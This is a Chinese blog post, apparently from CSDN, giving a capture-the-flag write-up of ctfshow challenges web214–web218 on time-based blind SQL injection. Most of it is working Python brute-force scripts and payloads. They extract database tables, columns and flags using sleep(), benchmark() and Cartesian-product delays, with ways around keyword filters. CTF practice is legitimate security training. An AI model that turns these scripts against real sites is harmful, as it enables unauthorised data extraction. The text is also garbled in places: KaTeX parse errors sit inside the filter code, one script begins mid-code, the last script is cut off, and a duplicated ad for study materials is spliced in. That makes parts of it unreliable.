ctfshow-web延时注入平替-web217~web220,2024年最新2024年网络安全开发实战

最新推荐文章于 2024-07-10 14:03:37 发布
最新推荐文章于 2024-07-10 14:03:37 发布
阅读量999 收藏 26
点赞数 12
分类专栏: 2024年程序员学习 文章标签: 前端 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84164527/article/details/137557781
版权

“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}
for i in range(start,end):
mf = 0
for mid in flagStrDict:

data = {
“ip”:payload.format(i,mid),
“debug”:1
}

try:
t = time.time()
req = requests.post(url=urls, headers=headers, data=data,timeout=timeout)
endTime = time.time() - t
time.sleep(0.3)
mf += 1
print(f"find time: {int(endTime)} s \t and find payload: {payload.format(i,mid)}")
except Exception as e:
flag += mid
print(flag)
break

print(payload.format(i,mid))

if mf == len(flagStrDict):
print(“flag is :”+flag)
break

if name == “__main__”:

find database/tables/columns

flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”

find flag

flagStrDict2 = “{}ctfshow-0123456789abdegijklmnpqruvxyz”

def web214():
url = “http://13f1f1cf-dc0b-44ec-ac58-65536d39760f.challenge.ctf.show/”

find tables

payload1 = “if(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1)=‘{}’,sleep(3),1)”

find columns

payload2 = “if(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name=‘ctfshow_flagx’)),{},1)=‘{}’,sleep(3),1)”

find flag

payload3 = “if(substring((select flaga from ctfshow_flagx),{},1)=‘{}’,sleep(3),1)”

GetData2(url,payload=payload1,flagStrDict=flagStrDict1)

GetData2(url,payload=payload2,flagStrDict=flagStrDict1)

GetData2(url,payload=payload3,flagStrDict=flagStrDict2,start=1,end=55)

web214()

web215

原始信息

开始基于时间盲注

查询语句

//用了单引号

返回逻辑

//屏蔽危险分子

解题

测试的时候不是过滤了单引号,而是新增了单引号。

下面是脚本:

coding=utf-8

import requests,time

def GetData2(url,payload,flagStrDict,flag=“”,timeout=3,start=1,end=50,mode=1):
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}
for i in range(start,end):
mf = 0
for mid in flagStrDict:

data = {
“ip”:payload.format(i,mid),
“debug”:1
}

try:
t = time.time()
req = requests.post(url=urls, headers=headers, data=data,timeout=timeout)
endTime = time.time() - t
time.sleep(0.3)
mf += 1
print(f"find time: {int(endTime)} s \t and find payload: {payload.format(i,mid)}")

print(req.content)

except Exception as e:
if mode == 1:
flag += mid
elif mode == 2:
flag += chr(int(mid,16))
print(flag)
break
if mf == len(flagStrDict):
print(“flag is :”+flag)
break

if name == “__main__”:

find database/tables/columns

flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”

find flag

flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”

def web215():
url = “http://d86b4db8-c487-4cde-8209-1e104d9d5e51.challenge.ctf.show/”
payload1 = “select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())”
payload2 = “select(group_concat(column_name))from(information_schema.columns)where(table_name=‘ctfshow_flagxc’)”
payload3 = “select flagaa from ctfshow_flagxc”

id,flagaa,info

GetData2(url,payload=“'||if(mid((”+payload1+“),{},1)=‘{}’,sleep(3),1)||'”,flagStrDict=flagStrDict1,timeout=5)

GetData2(url,payload=“'||if(mid((”+payload2+“),{},1)=‘{}’,sleep(3),1)||'”,flagStrDict=flagStrDict1,timeout=5)

GetData2(url,flag=‘ctfshow{’,start=9,end=55,payload=“'||if(mid((”+payload3+“),{},1)=‘{}’,sleep(5),1)||'”,flagStrDict=flagStrDict2,timeout=5)

web215()

web216

原始信息

查询语句

where id = from_base64($id);

返回逻辑

//屏蔽危险分子

解题

照搬上一题脚本,修改未多线程爆破:

coding=utf-8

import requests,threading,time,concurrent.futures
“”"
多线程爆破脚本(省时间脚本)
“”"

def send_request(url,headers,data,timeout,strs):
try:
req = requests.post(url=url, headers=headers, data=data, timeout=timeout)
time.sleep(0.3)
except Exception as e:
return strs
return “”

def GetData3(url,payload,flagStrDict,flag=“”,timeout=3,start=1,end=50,threadNum=3):
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}
allList = []
flagStr = ‘’
for index in range(start,end):
dataList = [[{‘ip’: payload.format(index, strsDict), ‘debug’: 1},f"{index}:{strsDict}"] for strsDict in flagStrDict]
with concurrent.futures.ThreadPoolExecutor(max_workers=threadNum) as executor:
tasks = []
for data in dataList:
task = executor.submit(send_request, urls,headers,data[0],timeout,data[1])
tasks.append(task)

处理返回结果

results = []

for task in tasks:
result = task.result()
if result:
flagStr += (result.split(‘:’))[1]
results.append(result)
if results:
allList.append(results)
else:
break
print(flagStr)
string = flag
for i in allList:
if i!=[] or i!=[[]] or bool(i):
string += (i[0].split(‘:’))[-1]
print('flag: ',string)

if name == “__main__”:

find database/tables/columns

flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”

find flag

flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”

def web216():
url = “http://8c908286-df0a-42c6-8fe7-c94445d8f432.challenge.ctf.show/”
payload1 = “select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())”
payload2 = “select(group_concat(column_name))from(information_schema.columns)where(table_name=‘ctfshow_flagxcc’)”
payload3 = “select(group_concat(flagaac))from(ctfshow_flagxcc)”

ctfshow_flagxcc,ctfshow_info

GetData3(url,payload=“to_base64({})”.format(“if(mid((”+payload1+“),{},1)=‘{}’,sleep(5),1)”),flagStrDict=flagStrDict1,timeout=5)

id,flagaac,info

GetData3(url,payload=“to_base64({})”.format(“if(mid((”+payload2+“),{},1)=‘{}’,sleep(5),1)”),flagStrDict=flagStrDict1,timeout=5)

GetData3(url, flag=‘ctfshow{’, start=9, end=55,payload=“to_base64({})”.format(“if(mid((”+payload3+“),{},1)=‘{}’,sleep(5),1)”), flagStrDict=flagStrDict2, timeout=5)

web216()

payload部分在于:

def web216():
url = “http://8c908286-df0a-42c6-8fe7-c94445d8f432.challenge.ctf.show/”
payload1 = “select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())”
payload2 = “select(group_concat(column_name))from(information_schema.columns)where(table_name=‘ctfshow_flagxcc’)”
payload3 = “select(group_concat(flagaac))from(ctfshow_flagxcc)”

ctfshow_flagxcc,ctfshow_info

GetData3(url,payload=“to_base64({})”.format(“if(mid((”+payload1+“),{},1)=‘{}’,sleep(5),1)”),flagStrDict=flagStrDict1,timeout=5)

id,flagaac,info

GetData3(url,payload=“to_base64({})”.format(“if(mid((”+payload2+“),{},1)=‘{}’,sleep(5),1)”),flagStrDict=flagStrDict1,timeout=5)

GetData3(url, flag=‘ctfshow{’, start=9, end=55,payload=“to_base64({})”.format(“if(mid((”+payload3+“),{},1)=‘{}’,sleep(5),1)”), flagStrDict=flagStrDict2, timeout=5)

其中,要注意点在于:网络不好就没必要跑脚本了,因为实在……太依赖网络状态了。。。

半夜开了5G测试,一直出错误。同一个payload放BP跑了不到五分钟就全出来了,我……

web217

原始信息

查询语句

where id = ($id);

返回逻辑

//屏蔽危险分子
function waf(KaTeX parse error: Expected '}', got 'EOF' at end of input: …tch('/sleep/i',str);
}

解题

这个题目过滤了 sleep ,导致常用延时注入函数被过滤。这里对 sleep 的平替方案为:

select sleep(3):

平替为:

select benchmark(3500000,md5(‘www’));

具体的平替时间是测试出来的,使用 Burp 抓包出来进行平替测试即可。

具体测试方案就是:设置 3s 延迟,让后放上这种句子进行测试:ip=if(1,benchmark(3500000,md5('www')),1)&debug=1 .

测试

脚本如下,注意网络环境对延时注入的影响。

coding=utf-8

import requests,time,concurrent.futures
“”"
多线程爆破脚本
“”"

def send_request(url,headers,data,timeout,strs):
try:
req = requests.post(url=url, headers=headers, data=data, timeout=timeout)
time.sleep(0.3)
except Exception as e:
return strs
return “”

def GetData3(url,payload,flagStrDict,flag=“”,timeout=3,start=1,end=50,threadNum=5):
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}
allList = []
flagStr = flag
for index in range(start,end):
dataList = [[{‘ip’: payload.format(index, strsDict), ‘debug’: 1},f"{index}:{strsDict}"] for strsDict in flagStrDict]
with concurrent.futures.ThreadPoolExecutor(max_workers=threadNum) as executor:
tasks = []
for data in dataList:
task = executor.submit(send_request, urls,headers,data[0],timeout,data[1])
tasks.append(task)

处理返回结果

results = []

for task in tasks:
result = task.result()
if result:
flagStr += (result.split(‘:’))[1]

print([result],type(result))

results.append(result)
if results:
allList.append(results)
else:
print(“No results {}”.format(index))
break
print(flagStr)
string = flag
for i in allList:
if i!=[] or i!=[[]] or bool(i):
string += (i[0].split(‘:’))[-1]
print('flag: ',string)

t = threading.Thread(target=send_request,args=(urls,headers,data,timeout,flag,mid,i,payload))

if name == “__main__”:

find database/tables/columns

flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”

find flag

flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”

def web217():
url = “http://4afe2ce4-af43-46e5-a9c1-79b4b85cb45f.challenge.ctf.show/”
payload1 = “select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())”
payload2 = “select(group_concat(column_name))from(information_schema.columns)where(table_name=‘ctfshow_flagxccb’)”
payload3 = “select(group_concat(flagaabc))from(ctfshow_flagxccb)”

ctfshow_flagxccb,ctfshow_info

GetData3(url,payload=“{}”.format(“if(mid((”+payload1+“),{},1)=‘{}’,benchmark(3500000,md5(‘www’)),1)”),flagStrDict=flagStrDict1,timeout=5)

id,flagaabc,info

GetData3(url,flag=‘id,flag’,start=8,payload=“{}”.format(“if(mid((”+payload2+“),{},1)=‘{}’,benchmark(3500000,md5(‘www’)),1)”),flagStrDict=flagStrDict1,timeout=5)

GetData3(url, flag=‘ctfshow{’, start=9, end=55,payload=“{}”.format(“if(mid((”+payload3+“),{},1)=‘{}’,benchmark(3500000,md5(‘www’)),1)”), flagStrDict=flagStrDict2, timeout=5)

web217()

web218

原始信息

查询语句

where id = ($id);

返回逻辑

//屏蔽危险分子
function waf(KaTeX parse error: Expected '}', got 'EOF' at end of input: …p|benchmark/i',str);
}

解题

这过滤……又要寻找平替方案……

还有一个平替方案,利用大量的查询消耗时间:

if(mid(1,(SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c,information_schema.tables d),1)

其中的 SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c,information_schema.tables d 便是起到平替作用的sql查询语句。(笛卡尔积)

如果是使用延迟2s的话,特别考验爆破者的网络环境。特别是这种情况下特别容易出现flag错误的情况。

注意:这里的爆破延迟是1.7s,测试的具体方式是从Burp看回显时间测试出来的。

使用要求:

  1. 测试者正常回显(非测试笛卡尔积)的情况下延迟在0到1s之间。
  2. 测试者测试笛卡尔积的时候延迟在1.7或者大于1.7的范围。

下面是脚本:

coding=utf-8

import requests,time,concurrent.futures
from colorama import Fore, Back, Style, init
init()

“”"
单线程爆破
“”"

def GetData5(url,payload,flagStrDict,flag=“”,timeout=3.0,start=1,end=50,mode=1):
“”"
单线程爆破
:param url:目标url
:param payload:payload模板
:param flagStrDict:flag字典
:param flag:flag
:param timeout:超时时间
:param start:开始
:param end:结束
:param mode:模式
:return:
“”"
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}

thresholdNumber = 2
for i in range(start,end):
mf = 0
for mid in flagStrDict:

data = {
“ip”:payload.format(i,mid),
“debug”:1
}
t1 = time.time()
thresholds = 0

使用数据包阈值来过滤废包

经过测试,当前网络环境当中延迟1.7是笛卡尔积的极限。具体测试方法是把数据包转发到BP当中,尝试使用笛卡尔积直接发数据测试极限时间

try:
t = time.time()
req = requests.post(url=urls, headers=headers, data=data,timeout=timeout)
endTime = time.time() - t
time.sleep(0.3)

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

天花板技术停滞不前!**

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
[外链图片转存中…(img-9Zub7XMI-1712651474365)]
[外链图片转存中…(img-O0uF8VoY-1712651474365)]
[外链图片转存中…(img-TxpeTjcH-1712651474365)]
[外链图片转存中…(img-CeuPQ3ju-1712651474366)]
[外链图片转存中…(img-WDkitQXM-1712651474366)]
[外链图片转存中…(img-lVvG2bow-1712651474366)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
[外链图片转存中…(img-Oraclyty-1712651474366)]

2401_84164527
关注
  • 12
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python-基于Spark的电影推荐系统包含爬虫项目web网站后台管理系统以及spark推荐系统
08-10
《Python与Spark构建电影推荐系统:爬虫、Web前端与后台管理详解》 在现代互联网环境中,推荐系统已经成为个性化服务的重要组成部分,特别是在娱乐媒体领域,如电影推荐。本项目“Python-基于Spark的电影推荐系统”...
CTF时间盲注(延时注入
wikey 的博客
03-29 352
id=1′ and if(ascii(substr(database(),第一个字母,1))=115,sleep(2),0) –+id=1′ and if(ascii(substr(database(),第二个字母,1))=101,sleep(2),0) –+id=1′ and if(length(database())>(一个数字),sleep(2),0) –+//判断库名长度。if(1=2,1,sleep(1))即延迟一秒后回显。if(1=1,1,sleep(1))即输出一。
CTF实验吧-who are you?【基于sleep盲注脚本】
Sp4rkW的博客
07-21 5526
原题链接:http://ctf5.shiyanbar.com/web/wonderkun/index.php 首先打开链接看到显示your ip is : xxx 首先想到这个题目与ip有关系,即与X-Forwarded-For存在一定关系 实验了一下,这里使用了google的Modify-http-headers插件进行修改ip为127.0.0.1,发现链接打开显示确实改变了,但是依旧...
web无插件音视频播放-WsPlayer
08-12
wsPlayer是一款专注于WebSocket-fmp4协议的web视频播放器,HTTP/WebSocket-fmp4协议与RTMP、HLS、HTTP-FLV相比,具有播放延时短,HTML5兼容性好等优点;
Web应用安全:Mysql盲注.pptx
06-19
Web应用安全领域中,MySQL盲注是一种常见的安全漏洞,它发生在SQL注入攻击中,但攻击者无法直接看到数据库的响应结果。在这种情况下,攻击者必须通过观察页面加载时间、页面内容的变化或者其他间接方式来判断SQL查询...
Web-Scrapping:使用Python进行Web爬网
05-01
Web爬虫是获取大量网络数据的一种技术,Python作为编程语言中的佼佼者,因其简洁的语法和丰富的库支持,成为了Web爬虫领域的首选工具。在本篇内容中,我们将深入探讨如何使用Python进行Web爬网,特别是利用...
wlpc.rar_CRAWL_java网络爬虫_web crawler_爬虫
09-19
网络爬虫,也被称为Web爬虫或Web机器人,是一种自动浏览互联网并抓取网页内容的程序。在Java中实现网络爬虫,可以让我们方便地获取大量网页数据,用于数据分析、信息提取、搜索引擎优化等多个领域。本项目“wlpc.rar...
一个使用Go语言和现代Web技术构建跨平台桌面应用程序开源项目
yunmoon的博客
07-10 768
Wails作为一个桥梁,连接强大的Go后端逻辑与丰富的Web前端界面,允许开发者利用两者的最佳特性来开发应用。
Webkit简介以及工作流程
最新发布
读心悦
07-10 248
WebKit是一个开源的浏览器引擎,最初由苹果公司基于KHTML(K Desktop Environment的HTML渲染引擎)开发,并广泛应用于Safari浏览器。随着时间的推移,WebKit也被其他多款浏览器和应用所采用,成为Web技术生态中的重要一员。WebKit的核心功能包括解析HTML、CSS、JavaScript等网页内容,并将其渲染为可视化的网页页面。它主要由WebCore(负责HTML解析、CSS样式计算和布局)和JavaScriptCore(负责JavaScript解释执行)两大部分组成。
Haproxy搭建Web群集
wkysdhr的博客
07-08 896
Haproxy 是目前比较流行的一种群集调度工具,同类群集调度工具有很多,如LVS 和Nginx。相比较而言,LVS 性能最好,但是搭建相对复杂;Nginx的upstream模块支持群集功能,但是对群集节点健康检查功能不强,高并发性能没有 Haproxy好。
JS混淆基本类型和原理
朴拙科技的博客
07-06 723
混淆技术为JS代码提供了一定程度的保护,但同时也给代码的维护和逆向工程带来了挑战。了解和掌握这些混淆技术的原理和解析方法,可以帮助开发者更好地保护或理解JS代码。然而,需要注意的是,混淆并不是万无一失的安全措施,它更多的是增加了攻击者理解代码的难度。在进行逆向工程时,应始终遵守法律法规,尊重知识产权,不要用于非法目的。
​​ 翻页 上一页/下一页
szzlh123456789的博客
07-09 293
【代码】​​ 翻页 上一页/下一页。
音乐播放器
m0_73755059的博客
07-05 757
【代码】音乐播放器。
图片压缩代码和实际操作页面
英雄汉孑的博客
07-05 1048
轻盈视界,高清依旧 —— 智能图片压缩,大容量,小体积,精彩不打折
myeclipse开发ssm框架项目图书管理系统 mysql数据库web计算机毕业设计项目
qq_251836457的博客
07-07 1078
摘 要随着计算机的广泛应用,其逐步成为现代化的标志。图书馆的信息量也会越来越大,因此需要对图书信息、借书信息、还书信息等进行管理,及时了解各个环节中信息的变更,要对因此而产生的单据进行及时的处理,为了提高高校图书馆自动化的管理,能够更快速的满足用户的要求,提高各种工作的效率,现对其设计相应的系统,以达到上述的目的。随着科学技术的进步,计算机行业的迅速发展,计算机信息处理系统的引进已彻底改变了许多系统的管理方式。因此,开发一款高校图书管理系统是至关重要的。根据需求,确定系统采用JSP技术,JAVA作为编程语言
解决后端限制导致前端配置跨域仍请求失败报504的问题
weixin_43883615的博客
07-07 633
当然,并不是端口号一致就可以绕过跨域,还需要添加其他配置,比如前端请求需要发送带有application/vnd.api+json头部信息,这样服务器就就可以将 Access-Control-Allow-Headers 设置为 application/vnd.api+json,客户端在跨域请求中就包含这个头部信息。
逆向案例十一——华强北登录逆向
m0_57265868的博客
07-10 126
发现有三个参数进行了加密,分别是Password,UserName和Deviceld,再登录一次发现最后一个参数是固定的。这个参数没定义,就去页面源码中,找出这个参数。进入后发现折叠的代码,貌似是des(它自己在上面写的),直接复制。我这是格式化后隐藏了。PS:我之前说第三个参数deviceid是固定,其实是错的,它是由这个函数定义的。这是一个获取设备id的函数,每一台设备都不一样,但同一台设备这个参数是固定的。复制代码在pycharm中的js文件中,最后一个参数是加密的密钥。点击登录,找到登录包。
Vue3中生成本地pdf并下载
weixin_62328265的博客
07-07 433
Vue3使用html2pdf.js实现在项目中导出指定的表格数据,包含实现步骤,源码分析,注释讲解等内容
ctfshow-web入门-文件上传(web151-web160)
Welcome To Myon'Blog !
07-07 882
试了下前端只能传 png 后缀的将一句话木马改成 png 后缀,上传后用 burpsuite 抓包绕过前端检测后,改回 php 后缀,发包拿到 flag:ctfshow{e3bd0332-4d5f-4255-941f-a2e6095c4f17}我们还可以直接改它前端验证的代码:原本只支持上传 png 后缀的文件我们加一个 php 后缀进去,即可直接上传 php 后缀的文件。
2022单元-MCS单片机内部结构.ppt
11-20
"2022单元-MCS单片机内部结构.ppt"是一份针对MCS-51单片机的详细介绍教程,主要聚焦于该型号单片机的内部构造及其应用。课程从基础入门开始,首先介绍了“单元二”的内容,即单灯受控闪烁的任务,旨在通过实践操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值